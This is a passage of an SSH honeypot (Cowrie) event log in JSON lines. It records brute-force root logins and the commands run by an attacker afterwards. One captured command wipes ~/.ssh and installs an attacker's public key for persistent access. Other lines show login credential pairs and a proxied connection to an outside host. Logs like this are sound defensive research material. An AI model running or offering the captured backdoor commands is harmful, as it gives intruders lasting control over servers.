{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:06:09.824862Z","src_ip":"212.227.235.229","session":"831964fc4bd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42316,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c73ecd2fa03","protocol":"ssh","message":"New connection: 212.227.235.229:42316 (1.2.3.4:22) [session: 5c73ecd2fa03]","sensor":"my-vps","timestamp":"2025-09-09T02:06:09.909351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:06:09.910288Z","src_ip":"212.227.235.229","session":"5c73ecd2fa03"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:06:09.996310Z","src_ip":"212.227.235.229","session":"5c73ecd2fa03"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:06:10.382938Z","src_ip":"212.227.235.229","session":"5c73ecd2fa03"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:06:11.472041Z","src_ip":"212.227.235.229","session":"5c73ecd2fa03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38484,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac6010359f18","protocol":"ssh","message":"New connection: 212.227.235.229:38484 (1.2.3.4:22) [session: ac6010359f18]","sensor":"my-vps","timestamp":"2025-09-09T02:06:11.554335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:06:11.555033Z","src_ip":"212.227.235.229","session":"ac6010359f18"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:06:11.639209Z","src_ip":"212.227.235.229","session":"ac6010359f18"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:06:12.017142Z","src_ip":"212.227.235.229","session":"ac6010359f18"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:06:12.102245Z","src_ip":"212.227.235.229","session":"831964fc4bd3"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:06:12.103175Z","src_ip":"212.227.235.229","session":"ac6010359f18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41788,"dst_ip":"1.2.3.4","dst_port":22,"session":"88f67a1a10af","protocol":"ssh","message":"New connection: 212.227.235.229:41788 (1.2.3.4:22) [session: 88f67a1a10af]","sensor":"my-vps","timestamp":"2025-09-09T02:06:15.964092Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59838,"dst_ip":"1.2.3.4","dst_port":22,"session":"653047ea40c2","protocol":"ssh","message":"New connection: 217.72.205.35:59838 (1.2.3.4:22) [session: 653047ea40c2]","sensor":"my-vps","timestamp":"2025-09-09T02:06:18.829258Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:06:18.830351Z","src_ip":"217.72.205.35","session":"653047ea40c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33673,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2d6349af82d","protocol":"ssh","message":"New connection: 212.227.235.229:33673 (1.2.3.4:22) [session: e2d6349af82d]","sensor":"my-vps","timestamp":"2025-09-09T02:06:51.179042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:06:51.195879Z","src_ip":"212.227.235.229","session":"e2d6349af82d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:06:51.470111Z","src_ip":"212.227.235.229","session":"e2d6349af82d"}
{"eventid":"cowrie.login.success","username":"root","password":"convidado","message":"login attempt [root/convidado] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:06:52.650207Z","src_ip":"212.227.235.229","session":"e2d6349af82d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:06:53.254229Z","src_ip":"212.227.235.229","session":"e2d6349af82d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59397,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e5795394831","protocol":"ssh","message":"New connection: 212.227.235.229:59397 (1.2.3.4:22) [session: 0e5795394831]","sensor":"my-vps","timestamp":"2025-09-09T02:06:54.156819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:06:54.158089Z","src_ip":"212.227.235.229","session":"0e5795394831"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:06:54.477725Z","src_ip":"212.227.235.229","session":"0e5795394831"}
{"eventid":"cowrie.login.success","username":"root","password":"convidado","message":"login attempt [root/convidado] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:06:55.373374Z","src_ip":"212.227.235.229","session":"0e5795394831"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:06:56.013636Z","src_ip":"212.227.235.229","session":"0e5795394831"}
{"eventid":"cowrie.command.input","input":"echo TEST","message":"CMD: echo TEST","sensor":"my-vps","timestamp":"2025-09-09T02:06:56.014307Z","src_ip":"212.227.235.229","session":"0e5795394831"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/20b052c7ab0867879e0d764da8c96e2a9d955af1d010a4423e8ffb5952625514","size":5,"shasum":"20b052c7ab0867879e0d764da8c96e2a9d955af1d010a4423e8ffb5952625514","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/20b052c7ab0867879e0d764da8c96e2a9d955af1d010a4423e8ffb5952625514 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:06:56.310140Z","src_ip":"212.227.235.229","session":"0e5795394831"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:06:56.311404Z","src_ip":"212.227.235.229","session":"0e5795394831"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52672,"dst_ip":"1.2.3.4","dst_port":22,"session":"e70a9561710d","protocol":"ssh","message":"New connection: 212.227.235.229:52672 (1.2.3.4:22) [session: e70a9561710d]","sensor":"my-vps","timestamp":"2025-09-09T02:07:01.697927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:07:01.699196Z","src_ip":"212.227.235.229","session":"e70a9561710d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:07:01.928507Z","src_ip":"212.227.235.229","session":"e70a9561710d"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123321","message":"login attempt [root/Aa123321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:07:02.888340Z","src_ip":"212.227.235.229","session":"e70a9561710d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:07:03.362332Z","src_ip":"212.227.235.229","session":"e70a9561710d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:07:03.363134Z","src_ip":"212.227.235.229","session":"e70a9561710d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:07:03.364079Z","src_ip":"212.227.235.229","session":"e70a9561710d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:07:03.595766Z","src_ip":"212.227.235.229","session":"e70a9561710d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:07:04.175459Z","src_ip":"212.227.235.229","session":"e70a9561710d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:07:04.176153Z","src_ip":"212.227.235.229","session":"e70a9561710d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:07:04.407782Z","src_ip":"212.227.235.229","session":"e70a9561710d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:07:04.408741Z","src_ip":"212.227.235.229","session":"e70a9561710d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47346,"dst_ip":"1.2.3.4","dst_port":22,"session":"44c43d21993a","protocol":"ssh","message":"New connection: 212.227.235.229:47346 (1.2.3.4:22) [session: 44c43d21993a]","sensor":"my-vps","timestamp":"2025-09-09T02:07:04.658878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:07:04.660143Z","src_ip":"212.227.235.229","session":"44c43d21993a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:07:04.900796Z","src_ip":"212.227.235.229","session":"44c43d21993a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:07:05.905240Z","src_ip":"212.227.235.229","session":"44c43d21993a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48542,"dst_ip":"1.2.3.4","dst_port":22,"session":"42016ec70eed","protocol":"ssh","message":"New connection: 212.227.235.229:48542 (1.2.3.4:22) [session: 42016ec70eed]","sensor":"my-vps","timestamp":"2025-09-09T02:07:06.291719Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:07:06.292736Z","src_ip":"212.227.235.229","session":"42016ec70eed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48842,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fe265edfcfd","protocol":"ssh","message":"New connection: 212.227.235.229:48842 (1.2.3.4:22) [session: 2fe265edfcfd]","sensor":"my-vps","timestamp":"2025-09-09T02:07:06.422185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:07:06.422840Z","src_ip":"212.227.235.229","session":"2fe265edfcfd"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T02:07:06.554142Z","src_ip":"212.227.235.229","session":"2fe265edfcfd"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:07:06.949969Z","src_ip":"212.227.235.229","session":"2fe265edfcfd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T02:07:07.081742Z","session":"2fe265edfcfd"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:07:07.146907Z","src_ip":"212.227.235.229","session":"44c43d21993a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47360,"dst_ip":"1.2.3.4","dst_port":22,"session":"e810cdfa027f","protocol":"ssh","message":"New connection: 212.227.235.229:47360 (1.2.3.4:22) [session: e810cdfa027f]","sensor":"my-vps","timestamp":"2025-09-09T02:07:07.365467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:07:07.366269Z","src_ip":"212.227.235.229","session":"e810cdfa027f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@opens